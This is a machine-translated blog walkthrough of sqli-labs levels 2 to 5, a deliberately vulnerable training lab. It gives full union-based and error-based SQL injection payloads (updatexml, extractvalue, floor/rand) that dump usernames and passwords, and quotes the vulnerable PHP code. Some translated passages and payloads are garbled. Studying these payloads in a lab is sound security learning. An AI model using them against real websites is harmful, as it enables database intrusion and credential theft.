当前位置:网站首页>Sqli-labs customs clearance (less2-less5)
Sqli-labs customs clearance (less2-less5)
2022-07-02 07:00:00 【Xu Jirong】
group by How it works
GET Digital injection
We do the test according to the steps in the previous article
Determine the injection point
Single quotation marks // Report errors
and 1=1 // The page is correct
and 1=2 // Page error
Determine the number of fields
order by 5 -- -
Judge the data display position at the front end of the data
union select 1,2,3,4-- -
Display user and database information
union select 1,user(),database(),4 -- -
Displays all table names of the specified database
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3,4 -- -
Check which fields the specified table has
union select 1,(select group_cancat(column_name) from information_schema.columns where table_schema = 'security' and table_name= 'users'),3,4 -- -
View all values of the corresponding field
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3,4 -- -
Let's check the source code first , We found that except for this sentence, the code of the first level is the same
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
What about the first level
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
One is digital , One is character type
Let's follow the process , The first step is to test whether the injection point is included
SELECT * FROM users WHERE id=1' LIMIT 0,1 // Report errors , And expose some query statements
http://localhost/sqli/Less-2/?id=1 and 1=1
SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 // The page is correct
http://localhost/sqli/Less-2/?id=1 and 1=2
SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 // Null value
From this we can judge that , There is probably an injection point here , And it is of digital type
Now order by It can't be used , We take select To test the number of fields
http://localhost/sqli/Less-2/?id=1 union select 1,2,3,4 -- -
SELECT * FROM users WHERE id=1 union select 1,2,3,4 -- - LIMIT 0,1 // Report errors
http://localhost/sqli/Less-2/?id=1 union select 1,2,3 -- -
SELECT * FROM users WHERE id=1 union select 1,2,3 -- - LIMIT 0,1 // The page is correct
From this, we can judge that the number of fields is 3
But at this time, there is no data display point , Because of what , We Navicat Check it out
because id The value is 1 That's right. , And the query statement limit 0,1 Show only the first line , So we can't see the value of the second line , At this time we will id Change the value to wrong or make the first part of the joint query statement null
http://localhost/sqli/Less-2/?id=1 and 1=2 union select 1,2,3 -- -
SELECT * FROM users WHERE id=1 and 1=2 union select 1,2,3 -- -LIMIT 0,1
At this time, the data display point is displayed , The latter is the same as the first level , We directly query the user name and password
http://localhost/sqli/Less-2/?id=1 and 1=2 union select 1,(select GROUP_CONCAT(CONCAT_WS(0x7e,username,password))from users),3 -- -
SELECT * FROM users WHERE id=1 and 1=2 union select 1,(select GROUP_CONCAT(CONCAT_WS(0x7e,username,password))from users),3 -- - LIMIT 0,1
Let's not look at the source code , We test it step by step
localhost/sqli/Less-3/?id=1' // Report errors , And expose the second half of the query statement '1'') LIMIT 0,1
localhost/sqli/Less-3/?id=1 and 1=1
// Show correct results
localhost/sqli/Less-3/?id=1 and 1=2
// Show correct results
In fact, the second half of the query statement has exploded here , We can also see that closure is ‘), Let's assume that there is no such error information
This way or Implicit query As a result of , This is the only way to judge non numeric , It's character type , We press ’( Single quotation marks ) Try closing
localhost/sqli/Less-3/?id=1' and '1'='1
// Show correct results
localhost/sqli/Less-3/?id=1' and '1'='2
// Show null values
Can it be determined that it is closed by single quotation marks ? We continue to test step by step
localhost/sqli/Less-3/?id=0' order by 3 -- -
Suppose you can't see the error information , From this we can also infer The closing symbol does not match
Common closing symbols are
It's nothing more than single quotation marks 、 Double quotes 、 Bracket combination , At that time, why did it seem right that we closed with single quotation marks , Let's see PHP Code for
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Let's take a look at the query statement
About MySQL Boolean transformation of , For the sake of understanding , We put LIMIT 0,1 Get rid of
localhost/sqli/Less-3/?id=1' and '1'='1
SELECT * FROM users WHERE id=('1' and '1'='1')
Let's try this again
localhost/sqli/Less-3/?id=2' and '1'='1
SELECT * FROM users WHERE id=('2' and '1'='1')
Try this again
localhost/sqli/Less-3/?id=2a' and '1'='1
SELECT * FROM users WHERE id=('2a' and '1'='1')
Why is that? , Let's sort out the first sentence of logic
localhost/sqli/Less-3/?id=1' and '1'='1
SELECT * FROM users WHERE id=('1' and '1'='1')
and Ahead ‘1’ Here it is converted into numbers 1 Numbers 1
and hinder ‘1’=‘1’ representative TRUE
The numbers in front 1 See behind TRUE, It is converted into TRUE do Boolean logic operation , The resulting TRUE And id Value judgement , So the result here is the same as that of the following query statement
Here , Why is the second sentence the same as the first sentence
- When operators , A function or process control structure requires a boolean When parameters are , The value will be Automatic conversion
- ≥1 The value of will be converted into TRUE
- 0 Or other non numeric string Will be converted into FALE
Why is it non numeric , Here also involves the blog mentioned in the previous chapter Implicit conversion , Like the third sentence
‘2a’ First, implicit conversion by Numbers 2, Then because of the operation with boolean type , It is converted into TRUE
Same thing , This results in the output of the fourth sentence being empty
So it may lead to miscarriage of justice , Notice here
The latter is the same as the previous process , Just closed is ')
We directly check the account number and password
localhost/sqli/Less-3/?id=0') union select 1,(select group_concat(username)from users),(select group_concat(password)from users) -- - SELECT * FROM users WHERE id=('0') union select 1,(select group_concat(username)from users),(select group_concat(password)from users) -- -') LIMIT 0,1
So this is a ') Closed GET Type character type injection
// Echo has value
http://localhost/sqli/Less-4/?id=1 and 1=1
// Echo has value
http://localhost/sqli/Less-4/?id=1 and 1=2
// Echo has value
It can be determined that it is not digital injection , Keep trying
http://localhost/sqli/Less-4/?id=1' and '1'='1
// Echo has value
http://localhost/sqli/Less-4/?id=1 and '1'='2
// Echo has value
The last thing I tried out was ")
http://localhost/sqli/Less-4/?id=1") and ("1")=("1
// Echo has value
http://localhost/sqli/Less-4/?id=1") and ("1")=("2
// Null value
The following test process is the same as the previous , Let's look at the account number directly , password
http://localhost/sqli/Less-4/?id=0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users) -- -
SELECT * FROM users WHERE id=("0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users) -- -") LIMIT 0,1
Let's take a final look at PHP Part of the source code , The rest are the same
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
Here's one PHP The arithmetic operators of Combined value
Connect two strings , Be similar to Python Of + Number
a = "Hello"."Word"
a The value of is "HelloWord"
So this is a ") Closed GET Type character type injection
// Error echo
http://localhost/sqli/Less-4/?id=1 and 1=1
// The page is displayed correctly , No echo value
http://localhost/sqli/Less-4/?id=1 and 1=2
// The page is displayed correctly , No echo value
We tried it out '( Single quotation marks ) closed
http://localhost/sqli/Less-4/?id=1' and '1'='1
// The page is displayed correctly , No echo value
http://localhost/sqli/Less-4/?id=1' and '1'='2
// The page displays a null value
There is an error message but no value echo , Let's see PHP Source code
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
echo '<font size="3" color="#FFFF00">';
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
else {
echo "Please input the ID as parameter with numeric value";}
We can see that , If the query of the timely value succeeds, the value will not be echoed
At this time, you can only pass through the back
This code shows back and forth the data we want , So what , Through three error reporting functions updatexml()、extractvalue()、floor()
grammar :
The first parameter :XML_document yes String Format , by XML The name of the document object .
The second parameter :XPath_string(Xpath Format string )
The third parameter :new_value,String Format , Replace the qualified data found
Popular will be to find data and replace data , We can't use the first parameter and the third parameter , The second parameter is used , And it's his Error return value .
Let's see what is XPath
XPath Is a door in XML The language in which information is found in a document , Let's enter some parameters and try
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,version()),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,version()),0) -- -' LIMIT 0,1
concat() Is a string concatenation function ,0x7e It stands for ~ , It seems to have been said before , What is the echo principle , Our purpose is to fill in the wrong xpath Parameter causes an error in the query , When you report an error, you will put xpath The query results of location are exposed ,xpath standard You can check the specifications by yourself , If not ~ Well
The echo will be incomplete , Because the result may be consistent with the first half xpath standard , Then it doesn't meet the requirements ( I guess. , Because I don't want to delve into this thing ), Suppose you add a ~ It's directly at the source that it doesn't meet the specifications , Or are those query statements that get data just placed in updatexml() Inside , We get the user name and password directly
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from users)),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from users)),0) -- -' LIMIT 0,1
Display incomplete
You can output line by line
http://localhost/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0) -- -
SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0) -- -' LIMIT 0,1
In addition to that
extractvalue() Function function : From the target XML Returns the string containing the query
grammar :
The first parameter :XML_document yes String Format , by XML Document object name , In this paper, for Doc
The second parameter :XPath_string(Xpath Format string )
http://localhost/sqli/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1))) -- -
SELECT * FROM users WHERE id='1' and extractvalue(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1))) -- -' LIMIT 0,1
This principle is more troublesome
Let's look at the results first
http://localhost/sqli/Less-5/?id=1' and (SELECT 2 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -
SELECT * FROM users WHERE id='1' and (SELECT 2 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -)' LIMIT 0,1
The following is a reference to Mysql Error reporting injection floor(rand(0)*2) Research on the principle of error reporting
I'll knock it again , I like to type while reading
Let's take a look first
return 0 To 1 The random number , He is a Pseudorandom function , rand(0) Internal 0 It's the seed , The random numbers produced by fixed seeds are the same
as follows :
floor(rand(0)*2) function
floor() Function returns less than or equal to x Maximum integer for , The above is to 0 To 1 Multiply by 2 Then round down , give the result as follows
Because the seed is fixed , This sequence is also fixed
group by
It mainly groups the data ( Divide the same into groups )
floor(rand(0)2))x Here is the general floor(rand(0)*2)) It's called x, It's just an alias , as follows
The number of records of statistical results
So when we use the following statement
select count(*),floor(rand(0)*2) x from users group by x
Literally , The original meaning of this sentence is to count the types of random numbers generated behind and calculate each quantity , Logically speaking 13 Data ,0110110011101,0 yes 5 individual ,1 yes 8 individual , But an error is reported here
group by How it works
Why? ? The key is to understand group by The working process of the function ,group by key Loop through each row of data during execution , Save the results in a temporary table . Read each row key when , If key Exists in a temporary table , Update the data in the temporary table ( update , No more calculations rand value ); If it's time to key Does not exist in temporary tables , Inserts in a temporary table key Data of the row .( When inserting data , Will recalculate rand value )
To understand this , Consider the following two
Let's remember again rand(0) Calculated results of 01101100…
Our goal is to generate such a table ,key Represents that this value is the primary key , Unique , We also mentioned above ,group by Loop through the table , The first time we traverse , First call rand(0),floor(rand(0)*2) The calculation result is 0
So we take the second step
At this time, it is necessary to recalculate and insert the value
The second calculation result is 1, So what we actually insert is 1,count(*) The corresponding value is also 1, as follows :
Then we continue to traverse the second , Be careful not to explain it to us rand() The confusion of functions ,rand() The order of calculation results is the same , Not every row of the generated table has the same result , Let's go through the second , You also need to calculate , The third calculation result is 1
We correspond to virtual table , It is found that this value exists , So take the first
We can update the data , therefore count(*) The number +1 that will do , as follows :
Traverse the third , The fourth calculation result should be 0
We check the virtual table to see if 0 So take the second
Insert a new line , and key It's the primary key , Is the only one. , Now we are going to insert a new line , Primary key conflict , That is to say Duplicate entry The error of .
Is it very complicated , It's not over yet
At this time, we put the data we want to check concat() go in
select count(*),concat(database(),floor(rand(0)*2))x from users group by x
The database is ’security’, And the back and in 1, Is a conflicting primary key
Then let's put the above sentence and Is it OK to go in
SELECT * FROM users WHERE id='1' and (select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)-- -)' LIMIT 0,1
Can not be , Reported a mistake ,Operand should contain 1 column( The operands should contain 1 Column ), For what ,and The following statement generates a virtual token , What we need is a Boolean value , So we need to put and Later, the query is changed to Boolean .
select * from users where id=1 and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from users group by x)a)
such and Grammatically and logically, there is no problem
So our final paylaod yes
http://localhost/sqli/Less-5/?id=1' and (SELECT 1 from(select count(*),CONCAT(DATABASE(),floor(rand(0)*2))x from users group by x)a)-- -
SELECT * FROM users WHERE id='1' and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from users group by x)a) -- -' LIMIT 0,1
- Win10: add or delete boot items, and add user-defined boot files to boot items
- Usage of map and foreach in JS
- Vscode installation, latex environment, parameter configuration, common problem solving
- php中生成随机的6位邀请码
- Queue (linear structure)
- Flex Jiugongge layout
- sqli-labs通关汇总-page3
- php中判断版本号是否连续
- DeprecationWarning: . ix is deprecated. Please use. loc for label based indexing or. iloc for positi
- js数组的常用的原型方法
No process runs when querying GPU, but the video memory is occupied
Latex compiles Chinese in vscode and solves the problem of using Chinese path
Date time API details
Linux MySQL 5.6.51 Community Generic 安装教程
Apt command reports certificate error certificate verification failed: the certificate is not trusted
Review of reflection topics
Cve - 2015 - 1635 (ms15 - 034) réplication de la vulnérabilité d'exécution de code à distance
UEditor . Net version arbitrary file upload vulnerability recurrence
CTF three count
Sqli labs customs clearance summary-page4
Latex 编译报错 I found no \bibstyle & \bibdata & \citation command
Kali latest update Guide
Sentry construction and use
Sqli-labs customs clearance (less18-less20)
Tool grass welfare post
Date time API details
No process runs when querying GPU, but the video memory is occupied
Automation - when Jenkins pipline executes the nodejs command, it prompts node: command not found
Usage of map and foreach in JS
The use of regular expressions in JS
Browser scrolling for more implementations